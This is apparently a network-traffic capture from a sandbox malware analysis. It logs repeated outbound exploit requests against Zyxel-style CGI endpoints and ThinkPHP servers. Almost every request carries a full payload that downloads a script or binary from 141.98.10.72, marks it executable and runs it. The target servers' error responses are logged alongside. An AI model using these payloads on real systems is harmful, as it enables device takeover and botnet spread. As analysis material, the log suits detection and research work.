                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            86192.168.2.233380485.158.57.2368080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.351389885 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:00.556253910 CET396INHTTP/1.0 401 Authentication Required
                                                            WWW-Authenticate: Basic realm="proxy"
                                                            Connection: close
                                                            Content-type: text/html; charset=us-ascii
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>401 Authentication Required</title></head><body><h2>401 Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            87192.168.2.233936695.216.27.1078080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.372806072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:00.598880053 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:28:00 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            88192.168.2.235733294.121.99.2418080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.394145966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            89192.168.2.235995662.29.72.958080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.394208908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            90192.168.2.235943894.110.176.1278080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.430229902 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            91192.168.2.235376095.130.85.23480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.882899046 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:02.083112001 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:03.494913101 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:06.338521957 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:11.969712019 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:23.232136965 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:47.292736053 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:32.342544079 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            92192.168.2.235347695.175.8.12680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.921124935 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:01.189837933 CET275INHTTP/1.1 505 HTTP Version not supported
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 140
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            93192.168.2.235429695.161.184.15880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:00.940453053 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:01.227207899 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            94192.168.2.234325295.169.186.21580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:01.088455915 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:01.295041084 CET479INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 11:27:46 GMT
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            95192.168.2.235056095.167.47.13480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:01.109435081 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:01.336023092 CET779INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            X-Strm-Log-Split: 3
                                                            Report-To: {"group": "network-errors", "max_age": 1200, "include_subdomains": true, "endpoints": [ {"url": "https://dr.yandex.net/strm", "priority": 1}, {"url": "https://dr2.yandex.net/strm", "priority": 2} ]}
                                                            NEL: {"report_to": "network-errors", "max_age": 1200, "success_fraction": 0.005, "failure_fraction": 0.05, "include_subdomains": true}
                                                            X_h: strm-mar-104.strm.yandex.net
                                                            X-Strm-Request-Id: ab1e36ce00b0ec19
                                                            X-Request-Id: ab1e36ce00b0ec19
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            96192.168.2.233949885.122.227.2278080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:01.960448027 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            97192.168.2.234838662.133.169.28080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:01.982472897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:02.261302948 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:24:21 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            98192.168.2.234431831.136.59.2408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:02.181694031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:02.850986004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:04.194773912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:07.106452942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:12.481681108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:23.232115030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
